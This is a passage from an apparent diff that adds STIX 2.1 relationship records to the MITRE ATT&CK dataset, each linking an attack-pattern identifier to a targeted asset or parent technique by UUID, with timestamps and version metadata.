"identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--9c09d008-fe9d-4c64-909a-ed1ba652cc5d", + "created": "2024-06-26T15:31:55.250Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-26T15:31:55.250Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--54ca26f3-c172-4231-93e5-ccebcac2161f", + "target_ref": "x-mitre-asset--8a455821-6e6e-49b0-9b6d-ac01011263c1", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--9c0db354-c2d6-4db0-bb76-35ae66c01dd1", + "created": "2023-09-28T20:11:52.625Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T20:11:52.625Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--40b300ba-f553-48bf-862e-9471b220d455", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--9c23121e-14bb-4382-b54d-2ea02a2815b5", + "created": "2023-09-28T19:59:44.009Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T19:59:44.009Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--c267bbee-bb59-47fe-85e0-3ed210337c21", + "target_ref": "x-mitre-asset--986c455b-0f43-42b6-8360-33ac48bd9990", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--9c3e2d88-4bb4-4fde-9c82-8556f140bf8d", + "created": "2024-06-27T09:09:46.840Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-27T09:09:46.840Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--e848506b-8484-4410-8017-3d235a52f5b3", + "target_ref": "x-mitre-asset--dcb786af-f1e7-449e-be48-46315c9789ca", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--9c487b3e-cf62-4a8f-af8a-3ea1ccf8a7d9", + "created": "2024-07-02T13:55:55.751Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.751Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--f6ad61ee-65f3-4bd0-a3f5-2f0accb36317", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--9c55e972-e968-438d-9112-4c56a9ca2319", + "created": "2024-07-02T13:55:55.763Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.763Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--9c713e02-f50d-4391-bdb7-fff7eb0885c8", + "created": "2024-07-02T13:55:55.770Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.770Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--79a4052e-1a89-4b09-aea6-51f1d11fe19c", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--9c78fde8-2b0b-47cc-8598-db47993e2ff9", + "created": "2024-06-26T19:26:38.030Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-26T19:26:38.030Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--7decb26c-715c-40cf-b7e0-026f7d7cc215", + "target_ref": "x-mitre-asset--7818eb69-414c-43d2-9816-77e90a710edc", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--9c7a7491-cdea-44af-872d-75c6f89b52b6", + "created": "2024-06-27T09:35:31.641Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-27T09:35:31.641Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--8565825b-21c8-4518-b75e-cbc4c717a156", + "target_ref": "x-mitre-asset--dcb786af-f1e7-449e-be48-46315c9789ca", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--9c924682-0c03-4978-b7aa-b0d145eec692", + "created": "2024-07-02T13:55:55.755Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.755Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--806a49c4-970d-43f9-9acc-ac0ee11e6662", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--9c9ba01a-2160-4dc9-853a-73f67f4f1a1e", + "created": "2024-07-02T13:55:55.756Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.756Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--aedfca76-3b30-4866-b2aa-0f1d7fd1e4b6", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--9cc440a2-5770-449d-8886-fcc0d221deaf", + "created": "2023-04-12T22:27:54.023Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-12T22:27:54.023Z", + "description": "", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--bef8aaee-961d-4359-a308-4c2182bcedff", + "target_ref": "attack-pattern--3d333250-30e4-4a82-9edc-756c68afc529", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--9ccc8e42-3e21-4fa2-99fb-6be03d59c12d", + "created": "2024-07-02T13:55:55.750Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.750Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--8e350c1d-ac79-4b5c-bd4e-7476d7e84ec5", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--9cd767aa-473a-4ca5-93fa-a1bd1eeb5434", + "created": "2024-06-21T14:12:20.274Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.274Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--bd369cd9-abb8-41ce-b5bb-fff23ee86c00", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--9d0be362-0847-4f74-82cc-239efc25b7d6", + "created": "2024-06-21T14:12:20.258Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.258Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--57340c81-c025-4189-8fa0-fc7ede51bae4", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--9d104149-6c5f-4cb9-91af-1090a462e236", + "created": "2024-06-21T14:12:20.274Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.274Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b80d107d-fa0d-4b60-9684-b0433e8bdba0", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--9d1d67d7-7439-4e78-88b6-86bfa0109c8a", + "created": "2024-07-02T13:55:55.766Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.766Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b77cf5f3-6060-475d-bd60-40ccbf28fdc2", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--9d27c4e4-5592-437a-8099-9e66cfa3edf9", + "created": "2024-07-02T13:55:55.767Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.767Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--e624264c-033a-424d-9fd7-fc9c3bbdb03e", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--9d4c7ecf-ba31-475c-9a22-ad9331888541", + "created": "2024-07-02T13:55:55.761Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.761Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--dd43c543-bb85-4a6f-aa6e-160d90d06a49", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--9d59578c-8356-4978-8765-acbf215948d4", + "created": "2020-03-11T14:17:21.294Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--bd369cd9-abb8-41ce-b5bb-fff23ee86c00", + "target_ref": "attack-pattern--3f18edba-28f4-4bb9-82c3-8aa60dcac5f7", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--9d6fd77e-2130-47d3-8846-0c04d7df1a7a", + "created": "2024-07-02T13:55:55.750Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.750Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--9e7452df-5144-4b6e-b04a-b66dd4016747", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--9d7be380-2dee-4f74-9464-1dea3c8ca6f4", + "created": "2020-03-11T13:50:11.512Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--a3e1e6c5-9c74-4fc0-a16c-a9d228c17829", + "target_ref": "attack-pattern--e6415f09-df0e-48de-9aba-928c902b7549", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--9d925db0-de86-42c8-b69e-8d89e40328ed", + "created": "2020-02-18T18:35:21.839Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--1df0326d-2fbc-4d08-a16b-48365f1e742d", + "target_ref": "attack-pattern--b7dc639b-24cd-482d-a7f1-8897eda21023", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--9da377d0-40c3-40a6-ab0d-916d1d82c0ca", + "created": "2024-07-02T13:55:55.757Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.757Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--f7c0689c-4dbd-489b-81be-7cb7c7079ade", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--9dac5197-e69d-4875-82ff-f3a5d152dfc9", + "created": "2024-06-21T14:12:20.261Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.261Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--a2029942-0a85-4947-b23c-ca434698171d", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--9db4fa48-ebcd-4be3-9ec2-fe138de3afad", + "created": "2024-07-02T13:55:55.756Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.756Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b4409cd8-0da9-46e1-a401-a241afd4d1cc", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--9dc0d9c5-1701-47b7-971f-4a1992203776", + "created": "2020-02-11T18:45:34.404Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--f303a39a-6255-4b89-aecc-18c4d8ca7163", + "target_ref": "attack-pattern--0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--9de06a0d-bcfa-4ea0-82be-215015637a6d", + "created": "2024-07-02T13:55:55.771Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.771Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--c3888c54-775d-4b2f-b759-75a2ececcbfd", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--9e2a8538-53b9-48e8-bff6-d9a810d6fd4d", + "created": "2024-06-21T14:12:20.255Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.255Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--04fd5427-79c7-44ea-ae13-11b24778ff1c", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--9e38589d-921b-44e5-885a-aaa41deea8dd", + "created": "2024-07-02T13:55:55.771Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.771Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--d40239b3-05ff-46d8-9bdd-b46d13463ef9", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--9e5aa7b9-36ac-4ffb-9688-f2b1919ee74c", + "created": "2024-07-02T13:55:55.750Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.750Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b83e166d-13d7-4b52-8677-dff90c548fd7", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--9e8bf611-3c38-4625-876e-b5466a83ea2f", + "created": "2024-07-02T13:55:55.757Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.757Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--ef67e13e-5598-4adc-bdb2-998225874fa9", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--9e9099de-32a8-48c0-9c57-185f0077a381", + "created": "2024-07-02T13:55:55.753Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.753Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--41d9846c-f6af-4302-a654-24bba2729bc6", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--9e946e2e-5a50-40a6-997f-8027e9c64a22", + "created": "2024-06-21T14:12:20.263Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.263Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--ea071aa0-8f17-416f-ab0d-2bab7e79003d", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--9e98d88c-4138-4d0e-8db0-cddf956ab500", + "created": "2023-09-29T18:07:28.902Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T18:07:28.902Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--cd2c76a4-5e23-4ca5-9c40-d5e0604f7101", + "target_ref": "x-mitre-asset--3a95f7e4-4877-4967-b2e8-e287976c3e64", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--9ecf53bf-9790-4e14-b952-924ac5277c8f", + "created": "2024-07-02T13:55:55.765Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.765Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--6faf650d-bf31-4eb4-802d-1000cf38efaf", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--9ede1eab-5f29-43dd-9a40-c65574f14947", + "created": "2024-07-02T13:55:55.752Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.752Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--035bb001-ab69-4a0b-9f6c-2de8b09e1b9d", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--9ee306bb-acf5-4259-8292-d674e1905ef8", + "created": "2024-06-21T14:12:20.259Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.259Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--7610cada-1499-41a4-b3dd-46467b68d177", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--9ef6f961-f383-4674-9c5c-6f5984cabee7", + "created": "2023-09-07T21:50:12.131Z", + "created_by_ref": 